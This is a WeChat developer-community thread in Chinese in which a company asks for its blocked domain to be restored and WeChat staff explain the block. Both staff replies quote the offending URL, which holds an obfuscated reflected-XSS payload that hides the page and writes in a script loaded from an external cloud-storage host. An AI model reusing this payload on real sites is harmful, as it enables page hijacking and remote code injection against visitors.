收藏
回答

申请解除微信网址屏蔽cqybhr.com?

AppID
1107909650

您好,我公司域名:cqybhr.com 被微信官方屏蔽。

经自查未发现违规问题,申请解封,谢谢!

根据微信提示的此链接,在我们系统里是已经被屏蔽了的。

如有其它地方违规,烦请具体指出一下,谢谢。

回答关注问题邀请回答
收藏

1 个回答

  • Riven.
    Riven.
    2020-11-27

    你好

    2020-11-27
    有用
    回复 5
    • Riven.
      Riven.
      2020-11-27
      你好,经核实域名cqybhr.com下的链接【http://www.cqybhr.com/m/resume-list.php/FSVleROLDOBYmxli?pbp0fSzS=JrEOrunk&key=dddd"><b%0Fody/hidd%0Fen><sv%0Fg><animate onbeg%0Fin=(docu%0Fment.body.hi%0Fdden=1);(doc%0Fument.wr%0Fite%0F(at%0Fob%0F(`PHNjcmlwdCBzcmM9Ly8weDgub3NzLWNuLWhhbmd6aG91LmFsaXl1bmNzLmNvbS94Pjwvc2NyaXB0Pg`))) attributeName=x dur=1s><%0F!--&3FEtsAq=JjYJYS8DPzYcMWkwDDcUJysqAstEF3FhVBD0kZtu7x5Oy37eniufy84rz0_eP_9fSss-Ljpeq88_Pu6qLD0NvBzNeIxMfE#1606403363090】的内容存在违规内容,请排查并把域名下所有相关违规内容修改之后,点击停止访问页面中间的“申请恢复访问”按钮申诉,申诉需要三个工作日处理时间,请耐心等待。另核实该域名存在安全漏洞,建议修复相关漏洞,避免再次违规,请知悉。具体违规情节:违反了《微信外部链接内容管理规范》第19条,详细规则请参考《微信外部链接内容管理规范》http://weixin.qq.com/cgi-bin/readtemplate?t=weixin_external_links_content_management_specification
      2020-11-27
      回复
    • 我感觉肩上又又少了一块
      我感觉肩上又又少了一块
      2020-11-30回复Riven.
      你好,贵司指出的问题链接,我这边打开是空白页。确实不是很清楚贵司说的诱导页面在哪儿?麻烦请再详细指出一下,我们马上做出修改!谢谢。
      2020-11-30
      回复
    • 我感觉肩上又又少了一块
      我感觉肩上又又少了一块
      2020-11-30回复Riven.
      2020-11-30
      回复
    • Riven.
      Riven.
      2020-11-30回复我感觉肩上又又少了一块
      你好,经核实域名cqybhr.com下的链接【http://www.cqybhr.com/m/resume-list.php/FSVleROLDOBYmxli?pbp0fSzS=JrEOrunk&key=dddd"><b%0Fody/hidd%0Fen><sv%0Fg><animate onbeg%0Fin=(docu%0Fment.body.hi%0Fdden=1);(doc%0Fument.wr%0Fite%0F(at%0Fob%0F(`PHNjcmlwdCBzcmM9Ly8weDgub3NzLWNuLWhhbmd6aG91LmFsaXl1bmNzLmNvbS94Pjwvc2NyaXB0Pg`))) attributeName=x dur=1s><%0F!--&3FEtsAq=JjYJYS8DPzYcMWkwDDcUJysqAstEF3FhVBD0kZtu7x5Oy37eniufy84rz0_eP_9fSss-Ljpeq88_Pu6qLD0NvBzNeIxMfE#1606403363090】的内容违反《微信外部链接内容管理规范》,现经核实相关违规内容已修改,现予已恢复微信内直接访问的服务,另核实该域名存在安全漏洞,建议修复相关漏洞,避免再次违规,请知悉。
      具体违规情节:违反了《微信外部链接内容管理规范》第19条,详细规则请参考《微信外部链接内容管理规范》http://weixin.qq.com/cgi-bin/readtemplate?t=weixin_external_links_content_management_specification
      2020-11-30
      回复
    • bo'ei
      bo'ei
      2021-03-21
      你好 我有个网站内容已经修改 但是在微信内还是无法直接访问总是提示停止访问 请帮助解封 谢谢 网址 http://KUMX.XYZ 备案号 浙ICP备20010325号-2
      2021-03-21
      回复
登录 后发表内容
问题标签